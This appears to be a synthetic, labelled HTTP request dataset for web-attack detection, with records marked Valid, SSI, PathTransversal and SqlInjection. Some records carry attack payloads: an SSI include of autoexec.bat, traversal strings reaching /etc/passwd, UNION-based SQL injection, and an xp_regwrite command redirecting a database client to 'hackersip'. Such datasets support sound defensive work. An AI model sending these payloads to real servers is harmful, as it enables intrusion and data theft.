GET /eZwabbaboSa/szibr/gl/k@xl0awb/3hAlRnlcepg3wy42e/lcgt0a/eiasaeat/z_wIHvGrI9access_logO.shtml?ipn0y0=-etu5oL&acoopv1i63ios=995589273&vk=Gs&adn=do&jJN7hf3X=axzE0Hlia&psrsanetbnX0li7=63447&scel=a4i-&ed=stylelhtaccesopt%5D&pegd4ul=s3LzWJS&sdsrnep=m%40copysi+ophp HTTP/1.0
Host: 6.219.25.218:108
Connection: xetOhsY
Accept: audio/*;q=0.8
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: identity, deflate;q=0.0, gzip;q=0.9, compress;q=0.7, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 180.91.240.171
Cookie: nhiobitibts2o=mrcpmeBostuexml d;T4I9smhnwniah=9811
Cookie2: $Version="55"
Date: Sat, 17 Dec 05 11:07:02 GMT
ETag: W/"zKHC5oP1_ptrfqFVg"
Expect: tyhinr
From: slnt@rItzvIc.net
If-Modified-Since: Fri, 12 Oct 07 08:32:40 CET
If-Unmodified-Since: Thu, 20 Oct 05 23:21:09 CET
If-Match: *
If-None-Match: "8UjIeiQhaRIUUvkxvF"
If-Range: "x19FvMrKnw-bYfY8"
Max-Forwards: 3805
MIME-Version: 1.9
Pragma: W='tsliag'
Proxy-Authorization: NTLM cmFyc0VuaTF5aHRvcjJsTnRpNXNpcml3aTh1ZWRzYXRlbGgxd2VoMkFsaHJzU29u
Authorization: NTLM dGl2cGtoZVBzMGUwU2RoZHRQZXBoZWV1eXRtbm1pZ29P
Range: 74-,31612-
Referer: /ydphzo.htm
TE: chunked;q=0.4,deflate,gzip;q=0.1
Trailer: Accept
User-Agent: aeyw8nsl (eSol11; rKIYEO_U; txzbWfltms; 8uVX24j5sC)
UA-CPU: StrongARM
UA-Disp: 221,658,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 873x2179
Via: HTTP/0.0 14.166.242.154:8242
Transfer-Encoding: identity
Upgrade: mrep/3.9, HDF/3.4, hmg/9.6, cFeer/0.4, nbtig/3.6
Warning: 653 www.rIlbwe.html:51762 "pn4htodnstaeHz" "Sat, 18 Dec 04 07:27:35 UTC"
X-Forwarded-For: 236.49.26.118
X-Serial-Number: 1194043277645
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26731
Start - Id: 20325
class: Valid
GET /hyG0/e3sr.msf?heh5mSeuSuenr=imhaexbr%24%25 HTTP/1.0
Host: 146.115.48.36:0372
Connection: eteteijx
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.7, compress;q=0.1, compress, compress;q=0.3
Accept-Language: *
Cache-Control: max-age=9542
Client-ip: 242.195.252.118
Cookie: hmfeethnmb=g(;uthty6=59;wefH62icczoaeX=6;cs=91;n3asi=Obe)nn]mamT4 8emqxmlt
Cookie2: $Version="51"
Date: Wed, 11 Jun 08 17:00:05 GMT
ETag: "CXJ-iSY5TW2-rp_6B2"
Expect: 100-continue
From: 9qbyo33@htvnn.org
If-Modified-Since: Mon, 16 Jan 06 23:07:53 UTC
If-Unmodified-Since: Thu, 18 Mar 04 22:15:14 UTC
If-Match: *
If-None-Match: "6oB.5SJ.oR7g2tPXnBLA"
If-Range: "5XYW4zB_1b73bssA"
Max-Forwards: 46
MIME-Version: 6.6
Pragma: bTt2senr=r9daapwA
Proxy-Authorization: Basic ZTI4bzplZXN0
Authorization: NTLM Y29lb3RhdGhrbDVUUnJCYW9pZXdlYXQ5aWlieHRCdWhlc3RxZWN0YnAyaDNtYw==
Range: 39-4,79168-,7750-8
Referer: /ccde/R6r6Eh.ace
TE: deflate,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.6 (Machintosh; U; Mac OS X 8.3; ro-sp; rv:0.9.7) Gecko/33009136
UA-CPU: PowerPC
UA-Disp: 2892,8834,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5764x832
Via: FTP/1.6 118.210.178.145
Transfer-Encoding: gzip
Upgrade: ha6gn/0.9, tetpr/6.4, exend/4.5, i4dR/0.3
Warning: 346 www.36mitaoo.jpeg "eaUhh" "Mon, 31 May 04 13:05:01 UTC"
X-Forwarded-For: 115.210.125.144
X-Serial-Number: 31655663279730
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20325
Start - Id: 40607
class: SSI
GET /pImxuvyKpU/a3murt/EeD.3plformm_d/mcrtnp.shtml?gsysAtnJp1Ca=gtE9m3hDmq%40l&DcHwj=ioEwget5&tdRsan=44&insioEdal=mtechoolqsti%7E+btesnwoa&cnton9rAonaYnr=%3C%21--+%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&EjrpriUr=Douna%25sta4 HTTP/1.0
Host: 239.199.25.47
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.3, deflate;q=0.6, deflate;q=0.1
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 146.4.65.176
Cookie: eeet4pq=5QoAT2lFG;jdeletesfUe=aastynoG;js=qoehr;ccenha=8
Cookie2: $Version="0"
Date: Sun, 08 Apr 07 06:06:33 CET
ETag: W/"hRpE5sdLGOIMRDDGsThB"
Expect: 100-continue
From: q67lte@ielenft.it
If-Modified-Since: Wed, 14 Feb 07 07:04:38 GMT
If-Unmodified-Since: Sun, 22 Jun 08 15:10:16 CET
If-Match: "ip44e8D6PF3ao_lI"
If-None-Match: "gzgBriVDGPuJFNsWj"
If-Range: Fri, 23 Oct 09 08:23:07 CET
Max-Forwards: 1
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: bcfrun ebAc=Lgatnzn
Authorization: NTLM cnllZWFvT2RkYVBubW5pdGh5ZWV1czlvaWRodGd0aG9t
Range: -7,-7178,-26215
Referer: /rseemwtu/ouele/0abostix/oAnseio.tiff
TE: deflate;q=0.2
Trailer: Expect
User-Agent: Mozilla/5.7 (Machintosh; U; PPC Mac OS X 0.6; 5e-ed; rv:4.2.4) Gecko/64516712
UA-CPU: PowerPC
UA-Disp: 252,6478,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7337x662
Via: 1.9 79.187.123.114:3936
Transfer-Encoding: raaoih; orcf=rs1ahHag
Upgrade: crlln/8.7, m6mMa/6.8, ehdTt/0.9, Rtiaun/0.7
Warning: 740 www.iawi.png:527 "cErneOeniy5Rfoed" 
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 431541377
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40607
Start - Id: 197
class: Valid
GET /Tv5XpFX.exe?wzO7nG=moM+&aEoEjipe78=r0&omT6i53VGDLk=%3CNhg&B4SD=3519&eyDsrinmotgwe=088&amioafAjNSjew=eLbJ HTTP/1.0
Host: www.ilan2.cz
Connection: keep-alive
Accept: text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: na-hmertk, a1ce5sn-g;q=0.3, b8enea-dHtyqS7, eurUr-wmhg
Cache-Control: no-store
Client-ip: 217.52.131.115
Cookie: ieitdeogrl=3175269;Mxp_lcugb5IP=rs;eeoi8arer=6;C1log2Nsystem=1rE
Cookie2: $Version="75"
Date: Fri, 09 Jan 04 10:25:17 UTC
ETag: W/"DSBddQD3Zg4giii"
Expect: 100-continue
From: dcet@elLtesue.uk
If-Modified-Since: Mon, 19 Feb 07 07:12:54 CET
If-Unmodified-Since: Sun, 20 Dec 09 22:31:11 CET
If-Match: *
If-None-Match: "@DV_KwhrXm.A6dQo"
If-Range: Mon, 13 Aug 07 02:52:18 CET
Max-Forwards: 192
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: yghn ueizw2es=eeel
Authorization: NTLM QnhmYWVpdG50dGttZGFHaTBoTm85dDByYXNVZGRoYWVlaHJmRXlpY29pZQ==
Range: 534828-
Referer: http://onds.org/saez/9nskl/frcsesa/btnis.conf
TE: trailers
Trailer: Accept-Charset
User-Agent: sjxrWn http://www.euFg6e.st
UA-CPU: StrongARM
UA-Disp: 021,047,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4314x599
Via: HTTP/6.5 191.174.196.218, neah/6.2 www.tglyrmm.png, HTTP/9.2 www.xouyd.css
Transfer-Encoding: deflate
Upgrade: ahei/7.4, ea4eeh/0.5, diptss/4.0, ensoe3/8.3
Warning: 087 www.ltOnotae.shtml:31935 "iiEllyneteg5u" "Thu, 28 May 09 07:54:06 GMT"
X-Forwarded-For: 209.28.165.11
X-Serial-Number: 3449007851195603
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 197
Start - Id: 7387
class: Valid
PUT /lU6Nu/ssgoaeBoeolaylh/FSkD/CnrrtsehidLMh9Hwiay/ikQgwhd0e8aeoOr/11jajPbk3ande/i_raizBjDVqGS3_ICTN/ooiutsgaIhi/3G4jQ1NS35EijDlN3/C1rmBZSHwgetgroup by/10QgZaIDBx7k-7JUHj6J.tiff? HTTP/1.0
Content-Length: 193
Content-Language: ibnl,imzma
Content-Encoding: gzip
Content-Location: /asaht/vLren/aecri30/twrhi.mpg
Content-MD5: ZWVpZXNoeWUzcmlMZGljZw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Apr 08 11:22:34 GMT
Last-Modified: Sun, 15 Jan 06 24:23:48 CET
Host: www.fetDtle.uk
Connection: close
Accept: text/xml
Accept-Charset: *
Accept-Encoding: identity;q=0.7, deflate;q=0.7
Accept-Language: ishhlh-qao;q=0.5, mcsuEni-k2uidbej;q=0.9, ocdy-wAd5pftk, tt-seeelan;q=0.7
Cache-Control: only-if-cached
Client-ip: 237.119.239.10
Cookie: gsie=eipmrdV7yA;Tajtpeuibdo=aTp9
Cookie2: $Version="490"
Date: Fri, 05 Sep 08 14:52:54 GMT
ETag: W/"h0Ub3tGUQhgHBSBo5X"
Expect: xastsswn=l3tnnlNx
From: coe5re@9jhe.fr
If-Modified-Since: Thu, 19 Apr 07 10:08:06 UTC
If-Unmodified-Since: Thu, 16 Feb 06 06:52:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8652
MIME-Version: 5.7
Pragma: z='rShswl'
Proxy-Authorization: Basic aXl0Yjpzc2NoaXJ0bg==
Authorization: Basic bW9vaG93Om9IaGFpbW8=
Range: 548915-60
Referer: /qgteeh/lardepo/sdk2l/aoO9g/hnpnrow.bin
TE: chunked,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/2.7 (X11; U; SunOS sun4u 1.5; sm-wn; rv:6.9.1) Gecko/18695040
UA-CPU: StrongARM
UA-Disp: 621,301,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 850x401
Via: eis/3.1 168.245.88.248
Transfer-Encoding: identity
Upgrade: pst/9.7, oub/7.2
Warning: 129 www.b5xcg9r.htm:36876 "FiaNtata6i" "Sat, 06 Feb 10 04:16:05 UTC"
X-Forwarded-For: 47.72.36.31
X-Serial-Number: 557256998518
----: -----------
~~~~~: ~~~~~~~~~~~

oyhuaslua=866&nsmTu=tqo4senadknmsdct&8tmp2NZ=468246&6en72ys=1525073078&0_g0lX_5QDD='et8I&uirl=55&99RzS7Mc=hipods&eN5sem=9bej(isnhv-igs&tE6=39436&zras=lstr rtmmm@[ ogs&dy=n9iiXXu&a1Ck= s

End - Id: 7387
Start - Id: 46322
class: PathTransversal
GET /thyElnthioev/1joDne/EnoSe/p8e.gif?sG7a=e12includeD&0rtacnr=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&hatne9Fbjtoehr=Me+odlzard&stbstmernrar=r HTTP/1.1
Host: www.lacdijiob.ch:071
Connection: close
Accept: video/*, text/plain;q=0.9, application/*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: lxi-aw8qk3rN;q=0.0
Cache-Control: no-transform
Client-ip: 25.14.246.74
Cookie: oriTku=ec sxt hnrkf;TR1sD=d5n5Wlbw;YCOwDv=rqlib;ey8a=5399609
Cookie2: $Version="67"
Date: Sat, 04 Oct 08 08:25:44 UTC
ETag: "csbZDEq4M4._0-0s2jK"
Expect: 100-continue
From: sgtDwB@5isge.ch
If-Modified-Since: Sun, 30 Aug 09 13:27:17 GMT
If-Unmodified-Since: Thu, 09 Apr 09 21:41:43 UTC
If-Match: "1swgFq-Ny_tsuC94bX"
If-None-Match: *
If-Range: *
Max-Forwards: 12
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/hecitr/doeame/jelauc/aesajiHl/e5sikade.cfm
Authorization: Digest nonce
Range: 595-7160,98-,4-961
Referer: http://ptiselki.be/Ait0dhx5/soaNhy/9soee/Unhsear/retddsp.aspx
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Llcs36ls/9.9.0.6.6
UA-CPU: Sparc
UA-Disp: 776,0792,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: 9.9 18.229.218.182, sbc/5.8 62.111.81.18
Transfer-Encoding: deflate
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 189.150.137.247
X-Serial-Number: 0373535580
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46322
Start - Id: 14560
class: Valid
GET /eesnxdx9tiowdTdkyP/oePO_5Pz8-LfDm.asmx?enetcatDP6lUHQbgsoundVq=tjtMDZzu5pt&yaUJshadiibOhAi=r9&OZxupdate.positioncOrg=lA5j&d5mRna5bsBb=Oe9aprelno&rraptaliinioI=0364459074&ctbov9ar=83&7k=39174018 HTTP/1.0
Host: 187.19.196.248
Connection: close
Accept: */*
Accept-Charset: euc-tw;q=0.2, cp-936;q=0.1
Accept-Encoding: identity;q=0.1, gzip;q=0.2, identity;q=0.9, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 169.246.83.97
Cookie: vinserttkXEi=6709386475;iht=817;gHKrR43ZqU=iast]window.openkD;Sm4=8:l
Cookie2: $Version="05"
Date: Thu, 12 Nov 09 15:40:18 UTC
ETag: W/"8pV7vNavsuZUMoVJp"
Expect: 100-continue
From: ax74s@nq6lretene.fr
If-Modified-Since: Wed, 11 Aug 04 10:42:36 CET
If-Unmodified-Since: Thu, 20 Dec 07 07:52:52 GMT
If-Match: "ip1CEAp.2@@092K"
If-None-Match: *
If-Range: Sun, 07 Jan 07 22:48:09 CET
Max-Forwards: 8304
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic dXJubnNFOkRnbnRFZW05
Authorization: Digest realm
Range: 197005-,3-
Referer: http://ohoptfet.it/bwyehl/toeucs/nbtw/Hdn93na/sb5avN.nsf
TE: trailers,deflate,chunked;q=0.0
Trailer: Accept-Language
User-Agent: Mozilla/7.4 (compatible; Konqueror/3.7; Open BSD i386; teinqcus; p9teuaEEho; ynutEs4h)
UA-CPU: 68000
UA-Disp: 962,7885,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7668x5565
Via: 9.4 56.196.183.141:4
Transfer-Encoding: 2hATs9
Upgrade: scAhts/5.3, ntread/5.7, ttaotf/9.8, Otisii/6.3
Warning: 447 www.izah.css "hrc6ulgi0o4ljoos" "Mon, 29 May 06 21:24:39 UTC"
X-Forwarded-For: 139.198.43.213
X-Serial-Number: 703782437729534
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14560
Start - Id: 35307
class: SqlInjection
GET /9ygpatGp0669a8t7ep/bgsound@KEpusIk6kNj/8p3H20mq/cD4zvGzuPobv/6WCdpKkl0LVU_/eo/pic9/gW/fckBj1X9o2bif-f/op/iE3ROxCqS.UG5/pzSY9wp-8wLpGp.html?J4hkp=oKedSZoRaY&srhw=i0v&g4OaRnat9na8na=rsu7&ehr=%40mperlmgks&yrWV-K0=8vilAAbgsoundran%27orsuqsc0u&NOvK@nD6Q=%27++++%2B++%28++SELECT++TOP+++++1+++SM++++FROM++b1ddhc%29+%2B++++%27&inbs=+5qescriptiMastyles+vw&nfswg9en=hem&like4F0f.6o=lst7wazwmenk&tYHNg65Z_-=bae4eathlko&r9dadtf=nenilloneaj&52=nIyhttp&hshiadrmtf=xnt+&gnasey168d=r+xZfot-&tkae4s=8794 HTTP/1.1
Host: 206.158.5.70
Connection: rcna
Accept: audio/*, image/*
Accept-Charset: shift_jis;q=0.1, windows-1250, macintosh, big5;q=0.2, x-mac-cyrillic;q=0.2
Accept-Encoding: gzip
Accept-Language: *;q=0.9
Cache-Control: min-fresh=9436
Client-ip: 213.3.132.26
Cookie: nvqstnTol=eaktxeitxy;5ihtaccesDdZDRwE=tth+f eqMunionpeeoa$Hn e;nFebvets=6DA_bKn
Cookie2: $Version="1"
Date: Thu, 21 Apr 05 11:30:43 GMT
ETag: "XhnahbLsp63w2wtblrc"
Expect: 100-continue
From: Nlnin@tbpee7c5t.it
If-Modified-Since: Sat, 16 Jun 07 05:14:19 CET
If-Unmodified-Since: Thu, 30 Oct 08 09:01:15 UTC
If-Match: "UZcdnfx8.OFJUnD"
If-None-Match: *
If-Range: Fri, 30 Jul 04 19:49:31 GMT
Max-Forwards: 47
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic bGVhY29vZjp0Z2xucmlv
Authorization: Digest nonce
Range: 132-569,1547-26,07-0259
Referer: /ddOvCb/ul4ir.png
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: mnoaeoSe8LxiOrey
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 048x605
Via: 7.2 29.140.115.46, HTTP/6.8 www.shhseom5.jpeg, 7.4 www.tr5alitb.htm:3747
Transfer-Encoding: compress
Upgrade: dzlnt/9.5, oo3l/2.4
Warning: 727 226.166.210.3 "etaemlotia" "Mon, 31 Jan 05 16:57:11 UTC"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 75933173899999851
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 35307
Start - Id: 29485
class: Valid
GET /evalUL5v-Y-crcp0IdocumentwW.tiff? HTTP/1.0
Host: www.Lfrse.ch:4
Connection: keep-alive
Accept: application/rtf, text/plain
Accept-Charset: cp-950, iso-8859-8-i;q=0.4, x-mac-arabic;q=0.0, iso-8859-2
Accept-Encoding: identity;q=0.5, identity, deflate, compress
Accept-Language: ohnAis-eAHIch;q=0.2
Cache-Control: min-fresh=35963
Client-ip: 73.184.178.164
Cookie: ataarM='a;hpfr6dgr7r3=9541036;ndhk=pst5;oa1pRogbEoaPtz=5
Cookie2: $Version="626"
Date: Sun, 14 Nov 04 18:08:52 CET
ETag: W/"e.9-Z97x5u2_n-Bwv"
Expect: 100-continue
From: hnoyso@ioJaegaa.st
If-Modified-Since: Tue, 15 Jan 08 23:38:38 UTC
If-Unmodified-Since: Tue, 19 May 09 19:08:09 CET
If-Match: *
If-None-Match: "1_0SXmsNiYLO_gaqmcKr"
If-Range: "qcL.gO8r1j-F-07_"
Max-Forwards: 6
MIME-Version: 4.0
Pragma: rnm=ot
Proxy-Authorization: Digest opaque="tidRaOc"
Authorization: Digest response="8fA8c2de0B88e6393f51A4688A09Dcd0"
Range: 6551-
Referer: /tdgtt/nwshdir/LN1tUre/nznyeto/ng8ier.wmn
TE: trailers
Trailer: If-Modified-Since
User-Agent: v4snkWju2F http://www.ptes2nms.it
UA-CPU: Sparc
UA-Disp: 3759,7587,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 522x597
Via: FTP/3.0 127.45.237.75, q1e/5.2 www.e02mh.js
Transfer-Encoding: identity
Upgrade: nene/2.6
Warning: 266 www.rVtzt.html:16670 "6zule1aar5p" 
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29485
Start - Id: 41427
class: SqlInjection
POST /TesI/d0h9jfFQf2Hcj/oxhosN9/PNdfupdatescriptna/EaoiiaIilnitlap/7Nn4BJWtmpwJ07o4U/mT4VaRRj.U6eimM/Jmn/owttscEsupmtr/eWOsl8T/_mXTf/io.jpeg? HTTP/1.0
Content-Length: 346
Content-Language: ao
Content-Encoding: gzip
Content-Location: /utlec/ecisja2/sibjd/cSxTe/eoamr.wmn
Content-MD5: YmRubnJ3NXJhcmlvbWE3cg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Feb 10 12:44:36 UTC
Last-Modified: Fri, 06 May 05 01:31:45 UTC
Host: www.rnln7i.biz
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.6, identity;q=0.2, gzip;q=0.5
Accept-Language: fcy83aY-rnpSmnr, tsgi-oerbg;q=0.8, seas0y-ee6h;q=0.3, elvpdab-hR;q=0.5, etcht-s93
Cache-Control: 8t=ahpf
Client-ip: 196.36.129.201
Cookie: _bgsoundokw=5039
Cookie2: $Version="458"
Date: Tue, 14 Jun 05 05:12:08 GMT
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: enoavte1=egee
From: hbituu@nl5IshaU.be
If-Modified-Since: Sat, 25 Sep 04 10:48:35 UTC
If-Unmodified-Since: Thu, 10 Dec 09 15:18:41 UTC
If-Match: "5IybfPEmxv5zbuKfR71V"
If-None-Match: "Ymizpe0zlydu2WdGsD"
If-Range: "nhfYEa5epnA9YaC"
Max-Forwards: 075
MIME-Version: 2.2
Pragma: rfnj9='q'
Proxy-Authorization: Digest qop=ymsaBhdy
Authorization: Digest response="81F678b71Cec7e540dBdF0573EaC9FC0"
Range: -86
Referer: /6nEye/tioff/tbue/yuo8agsr.swf
TE: trailers
Trailer: Date
User-Agent: Mozilla/0.8 (X11; U; Linux i386 9.3; ts-hp; rv:2.9.3) Gecko/59382772
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 738x118
Via: gen/6.5 145.215.31.105
Transfer-Encoding: deflate
Upgrade: rht/5.4
Warning: 430 www.idcmu.htm "dshooaoc" 
X-Forwarded-For: 47.63.17.194
X-Serial-Number: 9168693821015244526
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

iqyteetohisTn=703700&tmeatibas=8025470108&4nteeabg=')     UNION ALL     SELECT   aai ,     wrehooE   ,   htdc  FROM rs     WHERE  1zdr NOT     IN    ('rs'  )   AND eos    NOT    IN  (   'N6TeeU') AND  ''  = '&orseeeeo=mE:2a&cterlaciq=eit&Q0ybin8w=netcatai&G.ZOJQj=t92sWQ1L6&Rot@5mhtacces.Z0=Hejx&2mAb=rpsana2Nre7

End - Id: 41427
Start - Id: 9133
class: Valid
GET /mIollH/Yjsi@Mr6/erms6ysomntit/cEjyLwEdCkkV2HsZe/hWGD/onk/aFICaLc/l99gAO98_VDy.v/6in9mrt7wsute/pz9lwDfT@rFn.jpeg?wswrh7t=60577&5tiWqil3frTa=s9nfsOn&8axmtd=nwoai%3DctT&yi9epipr=93581470&ax=l4a&5amcmtcsrm=8&UNwdh=0&esl=a1I2GEeik350&9noiirgrEo=aietcs&oeoauopeetSite=%3Einserte&dmiEeolez=8721077&huke5d5n=%24s+ea%24toa&eNar2=tto7teudseb2 HTTP/1.0
Host: www.Snco7scnsh.st
Connection: close
Accept: video/mpeg;q=0.8, text/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eyE0steS-o;q=0.3, tsw-lek, v-oPl;q=0.3
Cache-Control: no-transform
Client-ip: 91.224.33.57
Cookie: rrnhyeoidaeg=ttsesuo;wG4telnettQbgBandevalE=iframer IS;gnaaicr=386745;dtNrtoS8ieoy5nT=36;V7MqIzB@@=lr;tbbvhalt=374743
Cookie2: $Version="69"
Date: Fri, 26 Mar 04 14:03:54 CET
ETag: W/"Olimrl8N8EDcthct"
Expect: 100-continue
From: meea6hi@1nad.biz
If-Modified-Since: Wed, 09 Feb 05 22:11:48 UTC
If-Unmodified-Since: Sat, 27 Feb 10 08:45:45 CET
If-Match: "VQJ_jnDE77Hh6efpLDo"
If-None-Match: "5mpkYTh8.xw9gMyaVI"
If-Range: *
Max-Forwards: 189
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: PMhc eie4rqi=aerRel
Authorization: NTLM c3lTYWU5bm9vaTl3bWVlb2hkdWljaWh0QWJld2hkdmhlNXRvaWo=
Range: -8237
Referer: /w2taf/Ihnsd/p74es/t0iser.conf
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: tsn6Hb (fvf5Hw_M)
UA-CPU: x86
UA-Disp: 419,947,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0794x264
Via: ooeA/8.6 8.74.199.4
Transfer-Encoding: identity
Upgrade: Oseec/1.0, nnnre/5.8, Erl/6.8, enun9n/4.2
Warning: 685 144.205.150.196 "yel0eefhm0pmd" 
X-Forwarded-For: 177.251.149.163
X-Serial-Number: 688483710117371
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 9133
Start - Id: 40972
class: SqlInjection
GET /dRrR/euhsoni48nysh1/dMXAwM/joaaau4Bhg1/eeY7snpomu6idphTe0ap/5g6cUzJXy9XQ6H/z2loesnlnm/Raconnect/m84P/rxOUOa.tiff?ludin5Netc=67808&dKluiEoohi7=eiar&SbincU=fneoer HTTP/1.1
Host: www.anae5ee.it
Connection: close
Accept: audio/basic
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.2, compress;q=0.9, identity;q=0.3, deflate;q=0.4, compress
Accept-Language: exec     xp_regwrite  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','srlrfm9utp','REG_SZ','DBMSSOCN,hackersip,80'
Cache-Control: max-stale=3
Cookie: sapRszyisestnee=af3kL@8s;sl=dIC;Eo2Bf9f5pTt=)ctbo;t3ir=57856;veeneOm5=se>stdin~-m?ttzt8;sRperlYK=8373018
Cookie2: $Version="34"
Date: Thu, 23 Apr 09 15:53:55 GMT
ETag: "Kf@7..91LZ5JErV-"
Expect: adtid6cn
From: fhayeuit@tufahb.fr
If-Modified-Since: Tue, 09 Feb 10 04:56:40 CET
If-Match: "2s@hyj2udmEJVZN@2XoJ"
If-Range: Fri, 14 Aug 09 18:54:07 GMT
Max-Forwards: 3
MIME-Version: 2.4
Pragma: ekno='o'
Range: 918-96362,718707-,-3
Referer: /iudva/xh5nmrgr/EtdYrbgt/baoa1ro/lnasln.conf
User-Agent: exec  xp_regwrite     'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','AmoOuc5v','REG_SZ','DBMSSOCN,hackersip,80'
Via: ito/1.4 63.163.43.211:00, FTP/4.0 195.25.212.38, HTTP/4.9 www.tiaOeu.gif
Transfer-Encoding: identity
Warning: 891 www.Dgnneo.png "tgConortovhrr" 
X-Forwarded-For: 175.150.199.175

null

End - Id: 40972
Start - Id: 46033
class: PathTransversal
GET /iT9y6tEa0ei/dDEISS/im-uWjLikmYfhCc/pipaest5psaaeyesi/zsutdrBomzqhspfreemm/K7m6RiRnupdate7xp_na/3fF1GRvJ5ylBxoziVz/paUH/o5y9ssu.mspx? HTTP/1.1
Host: 76.103.170.163:823
Connection: keep-alive
Accept: application/x-tar;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.8, deflate;q=0.0, gzip;q=0.7, compress
Accept-Language: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Cache-Control: only-if-cached
Client-ip: 160.240.116.78
Cookie: Hq6@F@r=iframetorm;n8cC8ueeli=Tfelseb;5yA6=eVvu;eaerheAsmIyiere=IdwimgmsiHynem;yepnseic2aTshl=jmjcoosNilagNR4pac;aps=stltey3nsiiguna
Cookie2: $Version="18"
Date: Tue, 14 Jun 05 20:58:15 UTC
ETag: "U5gKAQ4cgauyUI3m-kB"
Expect: 100-continue
From: 3tkiut@ootnnp.it
If-Modified-Since: Sun, 15 Jun 08 05:44:06 UTC
If-Unmodified-Since: Thu, 28 May 09 20:01:25 UTC
If-Match: *
If-None-Match: *
If-Range: "Yz5eeAEXMDwA1GAgi2"
Max-Forwards: 6
MIME-Version: 4.8
Pragma: teeliO=ts9Rotx
Authorization: Digest qop=ySteten
Range: 9679-,0-89825,53-
Referer: http://www.assn5th.gov/tcie.jpeg
TE: deflate,chunked
Trailer: Authorization
User-Agent: Mozilla/9.3 (X11; U; Unix 7.8; eh-sa; rv:5.8.2) Gecko/54681815
UA-CPU: Sparc
UA-Disp: 182,7559,16
UA-OS: Windows NT
UA-Color: color32
Via: HTTP/4.8 116.220.47.188:17, 0.6 155.20.85.194, HTTP/1.7 www.4soea.jpeg
Transfer-Encoding: er7u
Upgrade: r8e/5.4, ytes/5.2, sas/5.2, 0poct/8.8, abs6eS/3.5
Warning: 143 www.eihfkbo.htm "7taunsi" "Fri, 01 Apr 05 24:33:27 CET"
X-Forwarded-For: 20.101.217.179
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46033
Start - Id: 27933
class: Valid
